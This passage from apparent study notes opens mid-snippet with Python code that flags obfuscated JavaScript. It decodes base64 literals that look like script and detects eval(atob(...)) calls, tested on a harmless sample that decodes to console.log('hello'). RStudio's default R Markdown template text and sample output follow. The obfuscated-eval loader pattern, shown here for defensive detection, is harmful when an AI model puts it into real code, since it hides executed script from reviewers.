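var s = "Y29uc29sZS5sb2coJ2hlbGxvJyk=";
eval(atob(s));
var ok = "just a normal string";
"""

# Quoted runs of base64 alphabet characters, at least 16 long, optional padding.
B64_LITERAL = re.compile(r'["\']([A-Za-z0-9+/]{16,}={0,2})["\']')
# Substrings that suggest the decoded text is script rather than data.
JS_HINTS = ("document.", "window.", "eval(", "console.", "fetch(", "function")

def decode_candidates(js_source: str) -> list:
    """Return (encoded, decoded) pairs whose decoding looks like JavaScript."""
    findings = []
    for enc in B64_LITERAL.findall(js_source):
        try:
            raw = base64.b64decode(enc, validate=True)
        except (binascii.Error, ValueError):
            continue                       # not valid base64 after all
        try:
            text = raw.decode("ascii")
        except UnicodeDecodeError:
            continue                       # binary payload, not script text
        if any(hint in text for hint in JS_HINTS):
            findings.append((enc, text))
    return findings

def uses_dynamic_eval(js_source: str) -> bool:
    """True when the script decodes a string and passes it straight to eval/Function."""
    return re.search(r'\b(eval|Function)\s*\(\s*atob\s*\(', js_source) is not None

if __name__ == "__main__":
    for enc, dec in decode_candidates(SAMPLE_JS):
        print(f"{enc[:20]}... -> {dec!r}")
    print("eval(atob(...)) present:", uses_dynamic_eval(SAMPLE_JS))
```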

## 15.2 R Markdown

This is an R Markdown document. Markdown is a simple formatting syntax for authoring HTML, PDF, and MS Word documents. For more details on using R Markdown see http://rmarkdown.rstudio.com.

When you click the Knit button a document will be generated that includes both the content and the output of any embedded R code chunks within the document. You can embed an R code chunk like this:


## 15.3 Including Plots

You can also embed plots, for example:

Note that the `echo = FALSE` parameter was added to the code chunk to prevent printing of the R code that generated the plot.


```r
summary(cars)
```

```
##      speed           dist       
##  Min.   : 4.0   Min.   :  2.00  
##  1st Qu.:12.0   1st Qu.: 26.00  
##  Median :15.0   Median : 36.00  
##  Mean   :15.4   Mean   : 42.98  
##  3rd Qu.:19.0   3rd Qu.: 56.00  
##  Max.   :25.0   Max.   :120.00  
```



[Plot: pressure against temperature (axis ticks omitted)]

